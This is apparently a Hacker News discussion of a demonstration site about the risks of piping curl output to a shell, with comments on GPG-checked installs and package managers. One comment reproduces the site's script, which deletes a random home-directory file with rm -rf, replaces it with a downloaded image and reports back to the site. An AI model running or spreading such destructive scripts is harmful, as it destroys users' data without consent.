

Curl-to-shell russian roulette - coconutrandom
http://russianroulette.sh/

======
joshguthrie
You know what? This is perfect.

Some users are gonna go all "no", "this is bad", "no malware on HN" and "you
must be crazy to do it yadda yadda" on you, but in the end it doesn't matter
because you've done it: you've disrupted that little peace of mind they had
about running "curl rvm.io/install | sh".

Now they know that piping a curl command to shell is akin to unprotected sex.
Sure, I'd happily be the first to say "oh come on, we all know RVM, the guy
doesn't have any diseases: he's all clean, there's no risk" and we'd all be
happy to follow with some wishful thinking of "there's a one in a billion
chance something bad happens, no way I'm that unlucky".

But just like russian roulette, one bad time is enough to get in a _LOT_ of
trouble.

Sorry comrades, I'm done compromising my box's security on a daily basis. From
now on, I'll GPG-check your install scripts before piping them blindly to my
personal area :)

Even better: why don't we write a common install pattern for scripts?

Something simple like $ web-install [http://your-site.com/](http://your-
site.com/)

* Attempts to download conf file from [http://your-site.com/WEB_INSTALL](http://your-site.com/WEB_INSTALL)

* Looks up install script and gpg file path in the conf file

* Downloads install script and gpg file to /tmp and gpg-check the install script.

* If it all checks out, run the install script.

Or maybe we already have something cool like this but some developers seem to
think this commodities are for neckbeards who swim in gpg keys all day long?

PS: Using RVM as an example there because I only have them in mind but I did
this for npm too in the past and countless others I can't remember, so no hate
intended against them.

~~~
matt__rose
Gee, you mean like RPM, or deb files? Why people keep reinventing these tools,
but much worse, I have no idea.

~~~
joshguthrie
I thought of this, yeah. Which made me wonder: "why do we need to pipe a shell
script to install RVM instead of yum install RVM?".

I don't have an answer and would gladly accept one though I suspect it's
related to difficulties with deploying to multiple release systems (rpm, yum,
deb, apt-get, brew, ports,..).

------
pvnick

      #!/bin/sh
      ( 
      files=(~/*);
      f="${files[RANDOM % ${#files[@]}]}"
      rm -rf "$f"
      curl http://placekitten.com/g/320/240 > "$f"
      echo 'bang!' $f 'is now a kitten'  ) && curl --silent -o /dev/null http://russianroulette.sh/b/QPteR3KS/3/NamelessWonder
    

cute, but please refrain from pasting malware to HN

~~~
vezzy-fnord
At least you know he's serious about the Russian roulette. It also illustrates
the point, quite directly.

Reminds me of the old Casino DOS virus which copied the FAT to RAM and
proceeded to flush it, but challenged you to a game of slots to retrieve the
data (it was a fluke, your data would be destroyed in all cases).

By the way, the page markup isn't that bad. You're using tables and HTML4
semantics in an HTML5 doctype declaration, but the actual quality is fine.

------
Gurrewe
What about no?

------
Artemis2
Genius!

